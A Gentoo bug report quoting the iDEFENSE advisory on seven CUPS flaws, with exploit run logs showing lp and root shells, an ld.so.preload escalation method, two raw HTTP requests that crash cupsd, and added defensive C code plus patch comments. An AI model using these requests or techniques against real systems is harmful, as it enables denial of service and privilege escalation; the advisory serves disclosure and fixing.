Bug 12450 - net-print/cups
Summary: net-print/cups
Status: RESOLVED FIXED
Alias: None
Product: Gentoo Linux
Classification: Unclassified
Component: New packages
Hardware: x86 Linux
Importance: Highest critical with 1 vote
Assignee: Gentoo Security
Reported: 2002-12-19 12:30 UTC by Daniel Ahlberg (RETIRED)
Modified: 2003-02-04 19:42 UTC
Description Daniel Ahlberg (RETIRED) gentoo-dev 2002-12-19 12:30:32 UTC
iDEFENSE Security Advisory 12.19.02: Multiple Security Vulnerabilities in Common 
Unix Printing System (CUPS) 
 
From: "iDEFENSE Labs" <listserv@idefense.com>
To: aliz@gentoo.org
Date: Today 17.55.05
 
 
 
 
iDEFENSE Security Advisory 12.19.02: 
http://www.idefense.com/advisory/12.19.02.txt 
Multiple Security Vulnerabilities in Common Unix Printing System (CUPS) 
December 19, 2002 
 
 
I. BACKGROUND 
 
Easy Software Products' Common Unix Printing System (CUPS) is a 
cross-platform printing solution for Unix environments. It is based on the 
"Internet Printing Protocol," and provides complete printing services to 
most PostScript and raster printers. CUPS has a web-based graphical 
interface for printer management and is available on most Linux systems. 
More information is available at http://www.cups.org . 
 
The following major vendors are known to distribute CUPS by default; in 
some cases, it is the default printing implementation used as well: 
 
Apple Computer Inc. 
Debian Project 
FreeBSD Project 
MandrakeSoft Inc. 
NetBSD Foundation 
Red Hat Inc. 
Slackware Linux Inc. 
SuSE Inc. 
The SCO Group 
Turbolinux Inc. 
 
II. DESCRIPTION 
 
Exploitation of multiple CUPS vulnerabilities allows local and remote
attackers, in the worst of the scenarios, to gain root privileges. The
following test platforms were used for various parts of this advisory:
 
[1] - Red Hat Linux 7.0 running CUPS-1.1.14-5 (RPM) 
[2] - Red Hat Linux 7.3 running CUPS-1.1.14-15 (RPM) 
[3] - Red Hat Linux 7.3 running CUPS-1.1.17 (Source Install) 
 
 
 
**** ISSUE 1 - Multiple Integer Overflows **** 
 
An integer overflow exists in the CUPSd http interface. Exploitation 
allows an attacker to gain the permissions of the 'lp' user id and the 
'sys' group id. The offending lines of code can be found in cgi-bin/var.c: 
 
var                  = form_vars + form_count; 
var->name            = strdup(name); 
var->nvalues         = element + 1; 
var->avalues         = element + 1; 
var->values          = calloc(element + 1, sizeof(char *)); 
var->values[element] = strdup(value); 
 
Since an attacker has control over both element and value, he or she can 
overwrite the address of a soon-to-be called function with the address of 
arbitrary code. The following is a successful run of the vanilla-coke 
exploit ran against test platform [1] built against glibc-2.2.4-18.7.0.8: 
 
$ ./vanilla-coke 
 
$ ls -l /tmp/suid 
-rwsrwsr-x 1 lp sys 14093 Dec 4 07:50 /tmp/suid
 
$ /tmp/suid 
sh-2.04$ id 
uid=4(lp) gid=3(sys) groups=500(farmer) 
 
The exploit created a set user id 'lp' shell. While the current exploit 
works only against systems utilizing glibc-2.2.4-18.7.0.8, it is possible 
to make modifications that will make it effective against earlier glibc 
versions. The vulnerable code also exists in the latest version of CUPS 
(test platform [3]) and appears to be exploitable with slight 
modifications. 
 
Multiple integer overflows also exist in the image handling code of the 
filters in CUPS. The following is a successful run of the mksun exploit 
tested against platform [1]: 
 
$ ls -al /tmp/resulted 
/bin/ls: /tmp/resulted: No such file or directory 
 
$ ./mksun | lp 
request id is lp-100 (1 file(s)) 
 
$ cat /tmp/resulted 
Ok. 
uid=4(lp) gid=3(sys) 
groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel),40(dip) 
 
This vulnerability still exists in the latest version of CUPS (test
platform [3]); slight modification of the exploit code is required.
 
 
 
**** ISSUE 2 - /etc/cups/certs/ Race Condition **** 
 
A race condition exists in the creation of /etc/cups/certs/<pid>. This 
allows a local attacker to create or overwrite any file as root. A 
prerequisite to launching this attack is 'lp' user privileges, which can 
be gained through successful exploitation of ISSUE 1 (see above). 
 
The following is a successful run of the ice-cream exploit tested against 
platforms [1], [2], and [3]: 
 
sh-2.04$ /tmp/ice-cream 
Waiting for creation event. 
Trying 127.0.0.1... 
Connected to redhat7.0 (127.0.0.1). 
Escape character is '^]'. 
HTTP/1.1 200 OK 
Date: Wed, 04 Dec 2002 12:37:21 GMT 
Server: CUPS/1.1 
... 
... 
Connection closed by foreign host. 
Hit it. 
exec some suid with the lib preloading and then remove 
/etc/ld.so.preload-type-file to put things roughly the way they were. 
 
sh-2.04$ ls -l /etc/ld.so.preload-type-file 
-rw-rw-rw- 1 lp sys 20 Dec 4 07:37 /etc/ld.so.preload-type-file
 
The sample exploit created /etc/ld.so.preload-type-file. An easy 
modification can generate /etc/ld.so.preload, which can then be used to 
gain root privileges by redefining functions such as getuid() as a simple 
"return 0". 
 
 
 
**** ISSUE 3 - Adding Printers with UDP Packets/ Root Certificate Design 
Flaw **** 
 
Printers can remotely be added to CUPS by sending a specially crafted UDP 
packet. The ability to remotely add printers is used in ISSUE 3 as well as 
in the exploitation of other subsequent vulnerabilities within this 
advisory (see below). The added printer can contain a tainted name that 
when clicked on or referenced through other means (image request, etc.) 
can exploit ISSUE 1. The exploit does not have to be launched locally,
since the shellcode can be modified to connect back to a system
controlled by the attacker.
 
The following is a successful run of the new-coke exploit tested against 
platforms [1] and [2]: 
 
$ ./new-coke 127.0.0.1 
Argv[1]=127.0.0.1 
punt! 
 
Checking the web interface to CUPS after running this exploit shows the 
added printer. The only way to edit or remove this printer through the web 
interface is to click on it, which will in turn exploit the vulnerability. 
 
A consequence of exploiting this vulnerability is that a local attacker 
can exploit a design flaw to gain root privileges. A printer is first 
added and configured to run on a high numbered port. It is then told to 
return a "need authorization" page. The http backend will then authorize 
with the current local root certificate, as this is the same certificate 
that is needed to access the administrative section of the web server. 
Once the certificate has been obtained, it is possible to add a printer 
that will execute commands with root privileges. 
 
The following is a successful run of the pardonme exploit script tested 
against platform [1]: 
 
$ ./pardonme.sh 
Proof of concept - stealing certificate 0 from CUPS 
===================================================
Allows access to /admin/ area which we use to execute code as root.
 
- creating tmp printer to steal key from
- telling it we want the key.
- listening for key.
- attempting to create rootshell printer
- calling /tmp/doitnow
request id is givemeroot-4 (1 file(s))
- removing tmp printer "hackyou"
- removing root shell printer "givemeroot" - check /tmp/resulted
- done
 
=== contents of file === 
uid=0(root) gid=0(root) 
Thu Dec 5 02:19:13 GMT 2002 
=== contents of file === 
 
 
 
**** ISSUE 4 - Negative Length Memcpy() Calls **** 
 
Negative length memcpy() calls can lead to a denial of service (DoS) and, 
on some platforms, remote root compromise. The following examples 
demonstrate these vulnerabilities: 
 
$ nc -v localhost 631 
localhost [127.0.0.1] 631 (?) open 
POST /printers HTTP/1.1 
Host: localhost 
Authorization: Basic AAA 
Content-Length: -1 
 
$ nc -v localhost 631 
localhost [127.0.0.1] 631 (?) open 
POST /printers HTTP/1.1 
Host: localhost 
Authorization: Basic AAA 
Transfer-Encoding: chunked 
 
-FFFFFFFE
 
Both requests will crash the CUPS daemon. This issue is similar to the 
Apache HTTP Server chunking bug that is exploitable on OpenBSD, FreeBSD, 
and NetBSD due to their implementations of memcpy(). Platforms [1], [2] 
and [3] are all susceptible to this vulnerability. 
 
 
 
**** ISSUE 5 - Unsafe Strncat Function Call in jobs.c **** 
 
jobs.c insecurely uses the strncat function call in the setup of the 
'options' string. As such, it is possible to exploit this in conjunction 
with the vulnerability described in ISSUE 3 to obtain local root 
privileges. To exploit the vulnerability, a printer is created. A job is 
then sent to the printer with attributes set in such a fashion as to 
overflow the options buffer and overwrite the return address of the frame. 
Shellcode is then executed. It calls an external program, /tmp/doitnow, 
which will be executed with root privileges. In the process, two files are 
created that, unless removed, should prevent CUPS from starting: 
 
/var/spool/cups/d00*-0* 
/var/spool/cups/c00* 
 
The following is a successful run of the tosend script that utilizes the
lift exploit. It has been tested against platform [1]: 
 
$ ./tosend.sh 
* local root 
* cupsd incorrect usage of strncat in jobs.c 
* ==========================================
* proof of concept. appends output from "id" and "date" to /tmp/resulted
[+] checking stuff 
 * Checking for cupsd file 
 * Checking cupsd is running 
  * checking for /sbin/pidof 
  + ok! 
  * finding pid of process 
13427 
  + ok! 
 * Checking for make 
/usr/bin/make 
 * Checking for nc 
/usr/bin/nc 
[+] Building stuff 
 * Making lift 
make: `lift' is up to date. 
* firing message (needs netcat (nc) to be in your path) 
 punt! 
[+] About to check /tmp/resulted 
- time is now Wed Dec 4 14:27:16 EST 2002
- current uid == 500
- current gid == 500
 
The /tmp/doitnow script, in this case, simply contains the command "id > 
/tmp/didit.txt". The tosend script has successfully used the lift exploit, 
and the didit.txt file has been created, which, as can be seen from the 
contents, was executed with root privileges: 
 
# cat /tmp/didit.txt 
uid=0(root) gid=0(root) 
groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel) 
 
The exploit is not effective against later versions of CUPS since the 
strncat() calls have been replaced with calls to strlcat(). 
 
 
 
**** ISSUE 6 - Zero Width Images in filters/image-gif.c **** 
 
CUPS improperly checks for zero width images in filters/image-gif.c as can
be seen from the following offending code: 
 
... 
  bpp       = ImageGetDepth(img); 
  pixels    = calloc(bpp, img->xsize); 
... 
            xpos ++; 
    temp += bpp; 
    if (xpos == img->xsize) 
    { 
      ImagePutRow(img, 0, ypos, img->xsize, pixels); ... 
 
 
The check for reaching the line width is not performed until after the 
increment, therefore allowing an attacker to manipulate the chunk headers 
and execute arbitrary code. 
 
The following is a successful run of the nogif exploit tested against 
platform [1]: 
 
$ ./nogif 
zero width gif exploit for cups "imageto*" filters 
imagetops filter example. 
============================ 
ppmtogif: computing other colormap... 
ppmtogif: 256 colors found 
ppmtogif: sorting colormap 
Moving img1.gif to /var/tmp 
Now make and run ./wrap to emulate printing this job. 
 
$ ./wrap 
INFO: lp 7 root img1.gif 1 /var/tmp//////////img1.gif 
DEBUG: Page = 612x792; 18,36 to 594,756 
DEBUG: ImageOpen("/var/tmp//////////img1.gif", 1, 1, 100, 0, (nil)) 
 
Successful exploitation should execute the file /tmp/sh. This 
vulnerability still exists in the latest version of CUPS (test platform 
[3]). Slight modification of the exploit code is required, however. 
 
 
 
**** ISSUE 7 - File Descriptor Resource Leaks **** 
 
Return values of many file and socket operations are not checked, 
therefore leading to file descriptor leaks. Attackers can launch a DoS 
attack against a system running CUPS. The following is a successful run of 
the fanta exploit tested against platform [1]: 
 
$ ./fanta 
 
The error below doesn't appear to show up, and the process hangs at around 
300-400 somewhere sometimes. 
 
Problem in cups is caused by file descriptor leaks, and failing to check 
return values for file operations in many areas. 
0 sent 
100 sent 
200 sent 
 
 
III. ANALYSIS 
 
Local and remote attackers can exploit the above-described vulnerabilities 
on vulnerable CUPS versions to gain superuser privileges. Exploitation is 
relatively easy in most cases given exploit code, although certain 
modifications are necessary in certain instances. 
 
IV. DETECTION 
 
CUPS-1.1.14-5, CUPS-1.1.14-15, and CUPS-1.1.17 are susceptible. See the 
detailed DESCRIPTION section above to determine the specifics of 
implementation susceptibility. 
 
V. RECOVERY 
 
Crashed daemons must be restarted in order to resume normal operations. If 
the CUPS daemon cannot restart, check for the existence of the following 
files and remove them: 
 
/var/spool/cups/d00*-0* 
/var/spool/cups/c00* 
 
VI. VENDOR RESPONSES/FIXES 
 
Michael Sweet [mike@easysw.com] of Easy Software Products said CUPS 1.1.18 
will be released December 19, 2002 which addresses all of these issues 
(http://www.cups.org) . 
 
Mark J Cox (mjc@redhat.com) of Red Hat said the following: 
 
"Red Hat Linux 7.3 and 8.0 ship with CUPS, however it is not enabled by 
default. We are currently working on producing erratum packages. When 
complete, these will be available along with our advisory. At the same 
time, users of the Red Hat Network will be able to update their systems 
using the 'up2date' tool." 
 
Richard Blanchard (rblanchard@apple.com) of Apple said the following: 
 
"Affected Systems: 
     Mac OS X 10.2 - Mac OS X 10.2.2 
     Mac OS X Server 10.2 - Mac OS X Server 10.2.2 
     Mitigating Factors:  The described vulnerability can be remotely 
exploited only when Printer Sharing is enabled. Printer Sharing is not 
enabled by default on Mac OS X or Mac OS X Server. 
Fixed in:  Mac OS X 10.2.3 and Mac OS X Server 10.2.3" 
 
VII. CVE INFORMATION 
 
The Mitre Corp.'s Common Vulnerabilities and Exposures (CVE) Project has 
assigned the following identification numbers to these issues: 
 
CAN-2002-1383: ISSUE 1 - Multiple Integer Overflows 
CAN-2002-1366: ISSUE 2 - /etc/cups/certs/ Race Condition 
CAN-2002-1367: ISSUE 3 - Adding Printers with UDP Packets/ 
                         Root Certificate Design Flaw 
CAN-2002-1368: ISSUE 4 - Negative Length Memcpy() Calls 
CAN-2002-1369: ISSUE 5 - Unsafe Strncat Function Call in jobs.c 
CAN-2002-1371: ISSUE 6 - Zero Width Images in filters/image-gif.c 
CAN-2002-1372: ISSUE 7 - File Descriptor Resource Leaks 
 
VIII. DISCLOSURE TIMELINE 
 
10/27/2002      Initial discussion with contributor 
11/14/2002      Final contributor submission 
12/12/2002      CUPS author notified via e-mail to cups-support@cups.org 
12/12/2002      iDEFENSE clients notified 
12/12/2002      Response and preliminary patch received from 
                 CUPS author Michael Sweet (mike@easysw.com) 
12/12/2002      Apple, Linux Security List (vendor-sec@lst.de) 
12/13/2002      Updated patch received from Michael Sweet 
12/17/2002      Response received from Richard Blanchard 
                 (rblanchard@apple.com) 
12/19/2002      Coordinated Public Disclosure 
 
IX. CREDIT 
 
zen-parse (zen-parse@gmx.net) discovered these issues. 
 
 
 
 
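As an added example (not code from the advisory, from iDEFENSE or from CUPS), the following C program shows the checks that close the two integer-handling classes in the advisory: a bounded parser for attacker-controlled size fields such as the Content-Length and chunk size from ISSUE 4, reused to validate the form-variable index `element` before the calloc() and array store quoted in ISSUE 1. The limits MAX_FORM_ELEMENTS and MAX_REQUEST_BODY, the form_var_t layout and all function names are assumptions made for this example; the input strings are constructed.

```c
#include <ctype.h>
#include <errno.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Hypothetical limits for this example; they are not CUPS constants. */
#define MAX_FORM_ELEMENTS 1000          /* "name[N]" indices accepted: 0..999 */
#define MAX_REQUEST_BODY  (1024 * 1024) /* largest Content-Length or chunk size */

/* Parse an attacker-controlled size or index field (decimal or hex).
 * Rejects empty input, a leading sign or blank, trailing garbage, values that
 * overflow unsigned long, and anything above `max`. The sign check matters:
 * strtoul("-1", ...) silently yields ULONG_MAX, which is how a negative
 * Content-Length or chunk size (ISSUE 4) turns into an enormous memcpy(). */
int parse_bounded_size(const char *text, int base, size_t max, size_t *out)
{
    char *end;
    if (text[0] == '\0' || text[0] == '-' || text[0] == '+' ||
        isspace((unsigned char)text[0]))
        return -1;
    errno = 0;
    unsigned long v = strtoul(text, &end, base);
    if (end == text || *end != '\0' || errno == ERANGE || v > max)
        return -1;
    *out = (size_t)v;
    return 0;
}

/* Local strdup() replacement so the example needs only ISO C headers. */
static char *dup_string(const char *s)
{
    size_t n = strlen(s) + 1;
    char *p = malloc(n);
    if (p != NULL)
        memcpy(p, s, n);
    return p;
}

typedef struct {
    char   *name;
    size_t  nvalues;
    size_t  avalues;
    char  **values;
} form_var_t;

/* Hardened counterpart of the var.c sequence quoted in ISSUE 1: the index is
 * validated before it reaches calloc() and the array store, so element + 1
 * can neither wrap nor exceed the allocation. Returns 0 on success, -1 on a
 * rejected index or allocation failure. */
int form_var_set(form_var_t *var, const char *name, const char *index_text,
                 const char *value)
{
    size_t element;
    if (parse_bounded_size(index_text, 10, MAX_FORM_ELEMENTS - 1, &element) != 0)
        return -1;

    /* calloc() also checks count * sizeof(char *) for overflow itself. */
    char **values     = calloc(element + 1, sizeof(char *));
    char  *name_copy  = dup_string(name);
    char  *value_copy = dup_string(value);
    if (values == NULL || name_copy == NULL || value_copy == NULL) {
        free(values); free(name_copy); free(value_copy);
        return -1;
    }
    var->name            = name_copy;
    var->nvalues         = element + 1;
    var->avalues         = element + 1;
    var->values          = values;
    var->values[element] = value_copy;   /* in bounds: element < avalues */
    return 0;
}

void form_var_free(form_var_t *var)
{
    for (size_t i = 0; i < var->avalues; i++)
        free(var->values[i]);
    free(var->values);
    free(var->name);
    memset(var, 0, sizeof *var);
}

/* Stand-alone demonstration on constructed inputs. */
int main(void)
{
    /* Constructed size fields shaped like the request headers in ISSUE 4. */
    const char *fields[] = { "512", "-1", "FFFFFFFE" };
    int bases[] = { 10, 10, 16 };
    for (int i = 0; i < 3; i++) {
        size_t n;
        int ok = parse_bounded_size(fields[i], bases[i], MAX_REQUEST_BODY, &n);
        printf("size field %-9s -> %s\n", fields[i], ok == 0 ? "accepted" : "rejected");
    }
    form_var_t var = {0};
    printf("index 2147483647 -> %s\n",
           form_var_set(&var, "job", "2147483647", "x") == 0 ? "stored" : "rejected");
    if (form_var_set(&var, "job", "5", "x") == 0) {
        printf("index 5 -> stored in %zu slots\n", var.avalues);
        form_var_free(&var);
    }
    return 0;
}
```

The same parser is deliberately used for both header values and the form index: the daemon's failure mode in both issues is an unchecked integer taken from the request, and one rejecting parser with an explicit upper bound removes the negative, oversized and wrapped cases at once.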
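ISSUE 5 turns on the difference between strncat() and strlcat() when a job's attributes are appended into a fixed 'options' buffer. As an added example (not CUPS code and not from the advisory), this C program builds such a string with a truncation-detecting append; my_strlcat is an own implementation of the BSD strlcat() contract written for the example, and the attribute names, values and buffer sizes are constructed.

```c
#include <stdio.h>
#include <string.h>
#include <stddef.h>

/* Own implementation of BSD strlcat() semantics (written for this example,
 * not the CUPS one). Appends src to dst within a buffer of `size` bytes,
 * always NUL-terminates when size > 0, never writes past dst[size - 1], and
 * returns the length it tried to build, so a result >= size means truncation. */
size_t my_strlcat(char *dst, const char *src, size_t size)
{
    size_t dlen = 0;
    while (dlen < size && dst[dlen] != '\0')
        dlen++;
    size_t slen = strlen(src);
    if (dlen == size)              /* dst not terminated inside size bytes */
        return size + slen;
    size_t room = size - dlen - 1; /* bytes left before the terminator */
    size_t copy = slen < room ? slen : room;
    memcpy(dst + dlen, src, copy);
    dst[dlen + copy] = '\0';
    return dlen + slen;
}

/* The misuse pattern behind ISSUE 5, kept in a comment because running it
 * corrupts memory: strncat()'s third argument bounds the bytes *appended*,
 * not the destination, so
 *
 *     char options[64];
 *     strncat(options, attr, sizeof(options));
 *
 * may write up to sizeof(options) bytes plus a NUL past whatever is already
 * in options. The correct strncat() bound is
 * sizeof(options) - strlen(options) - 1, which strlcat() works out itself. */

/* Builds "name=value name=value ..." from job attributes into options[size].
 * Returns 0 on success, -1 when the full string would not fit; in that case
 * the buffer holds a NUL-terminated prefix and nothing was written past it. */
int build_options(char *options, size_t size,
                  const char *const names[], const char *const values[],
                  size_t count)
{
    if (size == 0)
        return -1;
    options[0] = '\0';
    for (size_t i = 0; i < count; i++) {
        if (i > 0 && my_strlcat(options, " ", size) >= size) return -1;
        if (my_strlcat(options, names[i], size) >= size)     return -1;
        if (my_strlcat(options, "=", size) >= size)          return -1;
        if (my_strlcat(options, values[i], size) >= size)    return -1;
    }
    return 0;
}

/* Stand-alone demonstration with constructed job attributes. */
int main(void)
{
    const char *names[]  = { "copies", "media", "job-name" };
    const char *values[] = { "2", "a4", "quarterly-report-final-v3" };
    char small[24], large[128];

    int r1 = build_options(small, sizeof small, names, values, 3);
    printf("24-byte buffer: %s -> \"%s\"\n", r1 == 0 ? "fits" : "truncated", small);
    int r2 = build_options(large, sizeof large, names, values, 3);
    printf("128-byte buffer: %s -> \"%s\"\n", r2 == 0 ? "fits" : "truncated", large);
    return 0;
}
```

A caller that treats the -1 as a rejected job (rather than silently printing a truncated options string) gets the safe behaviour the advisory attributes to the strlcat() replacement without depending on whether the platform libc ships strlcat() at all.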
Comment 1 Daniel Ahlberg (RETIRED) gentoo-dev 2002-12-20 12:01:04 UTC
lordvan: I've committed cups-1.1.18 and masked it, could you take a look at it and
see if it would break anything?
Comment 2 Thomas Raschbacher gentoo-dev 2002-12-29 05:35:57 UTC
it works :)
and afaik the security bugs are fixed in 1.1.18 :)
Comment 3 Daniel Ahlberg (RETIRED) gentoo-dev 2002-12-30 05:28:14 UTC
glsa sent